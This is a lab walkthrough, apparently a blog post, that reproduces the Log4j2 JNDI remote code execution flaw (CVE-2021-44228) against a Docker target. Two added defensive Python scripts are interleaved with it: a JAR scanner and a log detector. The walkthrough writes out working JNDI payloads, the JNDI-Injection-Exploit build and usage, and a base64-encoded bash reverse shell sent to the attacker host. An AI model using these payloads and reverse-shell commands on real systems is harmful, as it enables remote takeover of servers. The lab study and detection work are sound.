Apache Log4j2 RCE vulnerability reappears

1. Vulnerability introduction

Apache Log4j2 is a Java logging component. In certain versions the lookup feature is enabled, so a JNDI lookup string embedded in logged input is resolved by the library, resulting in a remote code execution vulnerability.

Affected versions: Apache Log4j 2.x <= 2.15.0.rc1

Vulnerability number: CVE-2021-44228
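For the affected-version statement above, a defender's first question is which deployed JARs fall in that range and still ship the lookup class. The following script is an added example, not code from the original post: it walks a directory, opens every log4j-core JAR, reads Implementation-Version from the manifest (falling back to the version in the file name), and checks for org/apache/logging/log4j/core/lookup/JndiLookup.class, the class that implements the lookup feature the post describes. The affected range is taken only from the post (2.x up to 2.15.0.rc1); the JARs written by demo() are constructed stand-ins with a manifest and an empty class entry, not real Log4j builds.

```python
"""Find log4j-core JARs and report whether they are in the affected range
and still contain the JNDI lookup class (added example, not from the post)."""
import os
import re
import tempfile
import zipfile

# Real class path inside log4j-core; presence means the lookup feature is shipped.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JAR_NAME_RE = re.compile(r"^log4j-core-(?P<version>[0-9][^/]*)\.jar$")


def parse_version(text):
    """Turn '2.14.1' or '2.15.0-rc1' into a sortable tuple; rc builds sort before the release."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:[-.]rc(\d+))?", text, re.IGNORECASE)
    if not m:
        return None
    major, minor, patch, rc = (int(x) if x else 0 for x in m.groups())
    # fourth element: 0 for release candidates, 1 for final releases
    return (major, minor, patch, 0 if rc else 1, rc)


def is_affected(version):
    """Affected range as stated in the post: Log4j 2.x up to and including 2.15.0.rc1."""
    v = parse_version(version)
    if v is None or v[0] != 2:
        return False
    return v <= parse_version("2.15.0-rc1")


def inspect_jar(path):
    """Return version, lookup-class presence and an affected verdict for one JAR."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
            if m:
                version = m.group(1)
        if version is None:
            fm = JAR_NAME_RE.match(os.path.basename(path))
            if fm:
                version = fm.group("version")
        has_lookup = JNDI_LOOKUP_CLASS in names
        return {
            "path": path,
            "version": version,
            "has_jndi_lookup": has_lookup,
            "affected": has_lookup and version is not None and is_affected(version),
        }


def scan_tree(root):
    """Inspect every log4j-core*.jar below root."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                results.append(inspect_jar(os.path.join(dirpath, name)))
    return results


def make_demo_jar(path, version, include_lookup):
    """Write a constructed JAR with only a manifest and (optionally) an empty JndiLookup.class entry."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     "Manifest-Version: 1.0\r\nImplementation-Version: %s\r\n" % version)
        if include_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")


def demo():
    """Build three constructed JARs in a temp dir and scan them; returns results sorted by path."""
    tmp = tempfile.mkdtemp()
    make_demo_jar(os.path.join(tmp, "log4j-core-2.14.1.jar"), "2.14.1", True)
    # same version with the lookup class removed, the common emergency mitigation
    make_demo_jar(os.path.join(tmp, "log4j-core-2.14.1-stripped.jar"), "2.14.1", False)
    make_demo_jar(os.path.join(tmp, "log4j-core-2.15.0.jar"), "2.15.0", True)
    return sorted(scan_tree(tmp), key=lambda r: r["path"])


if __name__ == "__main__":
    for r in demo():
        print("%s version=%s lookup=%s affected=%s" % (
            os.path.basename(r["path"]), r["version"], r["has_jndi_lookup"], r["affected"]))
```

Run it against a real application tree by calling scan_tree("/path/to/app") instead of demo(); JARs nested inside WAR or EAR archives are not unpacked by this version, so extract those first.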

2. Vulnerability environment construction

Target machine: Ubuntu, IP 192.168.241.129

Attack machine: Kali, IP 192.168.241.128

Since my Ubuntu virtual machine already has Docker set up, I can pull the vulnerable image directly with the following command:

sudo docker pull vulfocus/log4j2-rce-2021-12-09:latest

After the image is pulled, start the container locally with:

sudo docker run -itd -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

If you do not have Docker installed, you can use the Vulfocus shooting-range environment instead:

https://github.com/fofapro/vulfocus

After setup, open the virtual machine's IP and port in a browser:

http://192.168.241.129:8080


3. Vulnerability reproduction

1. DNSLog verification

Using a DNSLog platform:

https://dig.pm/

Obtain a subdomain name and construct the payload:

${jndi:ldap://5097bd9c.dns.1433.eu.org}

Click ??? in the browser, capture the request with Burp Suite and replace the parameter value with the payload. Sending the request as-is causes a server 400 error, so the payload needs to be URL-encoded first.


The DNSLog site successfully receives the resolution record.

2. JNDI injection reverse shell

Exploit the vulnerability with JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar:

https://github.com/welk1n/JNDI-Injection-Exploit

Tool usage:

git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
cd JNDI-Injection-Exploit
mvn clean package -DskipTests

The mvn command builds JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar; make sure Maven is installed before running it.

Usage:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

Reverse shell command:

bash -i >& /dev/tcp/ip/port 0>&1    // must be base64-encoded
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.241.128

You can see that 5 links are generated:

rmi://192.168.241.128:1099/zvrfsf
rmi://192.168.241.128:1099/xwa9m4
ldap://192.168.241.128:1389/xwa9m4
rmi://192.168.241.128:1099/e1twtt
ldap://192.168.241.128:1389/e1twtt

Now open another terminal and start nc listening:

nc -lvnp 4444 	// Kali
nc64.exe -lvnp 4444	// on Windows, run in cmd

Now craft the payload, URL-encode it, and send it with Burp:

${jndi:rmi://192.168.241.128:1099/zvrfsf}	// pick any one of the 5 links

The following log output then appears on the command line, indicating that execution succeeded.

At the same time, nc has received the reverse shell.
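Both the DNSLog check and the RMI/LDAP reverse-shell step above send a ${jndi:...} lookup string through an HTTP request, URL-encoded to get past the 400 error. The detection below is an added example, not code from the original post: it URL-decodes each web access-log line (repeatedly, since the post shows the payload must be encoded), matches the jndi lookup with its ldap:// or rmi:// callback, and extracts the callback host and port, which is the address a responder would block and hunt for in outbound connection logs. The log lines are constructed for this example and only reuse the lab addresses from the post.

```python
"""Detect Log4Shell-style JNDI lookup strings in HTTP access logs and pull out
the callback host/port (added example, not from the post)."""
import re
from urllib.parse import unquote

# Constructed access-log lines; callback addresses mirror the post's lab setup
# (192.168.241.x, the DNSLog subdomain) and are not real indicators.
SAMPLE_LOGS = [
    '192.168.241.128 - - [09/Dec/2021:10:00:01 +0000] "GET /hello?payload=%24%7Bjndi%3Aldap%3A%2F%2F5097bd9c.dns.1433.eu.org%7D HTTP/1.1" 400 -',
    '192.168.241.128 - - [09/Dec/2021:10:00:05 +0000] "GET /hello?payload=${jndi:rmi://192.168.241.128:1099/zvrfsf} HTTP/1.1" 200 12',
    '192.168.241.50 - - [09/Dec/2021:10:00:09 +0000] "GET /hello?payload=hello%20world HTTP/1.1" 200 12',
    '10.0.0.7 - - [09/Dec/2021:10:01:00 +0000] "POST /login HTTP/1.1" 302 - "Mozilla/5.0 ${jndi:ldap://192.168.241.128:1389/xwa9m4}"',
]

# ${jndi:<scheme>://<host>[:<port>]<rest>} ; scheme is checked case-insensitively
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?[^}]*\}",
    re.IGNORECASE,
)


def decode_layers(text, max_rounds=3):
    """URL-decode until the text stops changing, bounded to avoid looping on pathological input."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(line):
    """Return [(scheme, host, port), ...] for every JNDI lookup found in the line."""
    decoded = decode_layers(line)
    hits = []
    for m in JNDI_RE.finditer(decoded):
        port = int(m.group("port")) if m.group("port") else None
        hits.append((m.group("scheme").lower(), m.group("host"), port))
    return hits


def scan_logs(lines):
    """Return (line_no, client_ip, scheme, host, port) for each suspicious line.

    The client IP is the first field of the common log format; the callback
    host is the attacker-controlled LDAP/RMI server, which may differ from it.
    """
    findings = []
    for i, line in enumerate(lines, 1):
        client_ip = line.split(" ", 1)[0]
        for scheme, host, port in find_jndi_lookups(line):
            findings.append((i, client_ip, scheme, host, port))
    return findings


if __name__ == "__main__":
    for line_no, client, scheme, host, port in scan_logs(SAMPLE_LOGS):
        print("line %d from %s: jndi %s callback to %s:%s" % (line_no, client, scheme, host, port))
```

Note that the third sample line is decoded too but produces no finding, and the fourth shows the lookup string arriving in the User-Agent rather than a query parameter; the regex is applied to the whole line so any logged field is covered. Only the plain ${jndi:...} form shown in the post is matched here; obfuscated variants would need additional patterns.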


Origin blog.csdn.net/huangyongkang666/article/details/124153414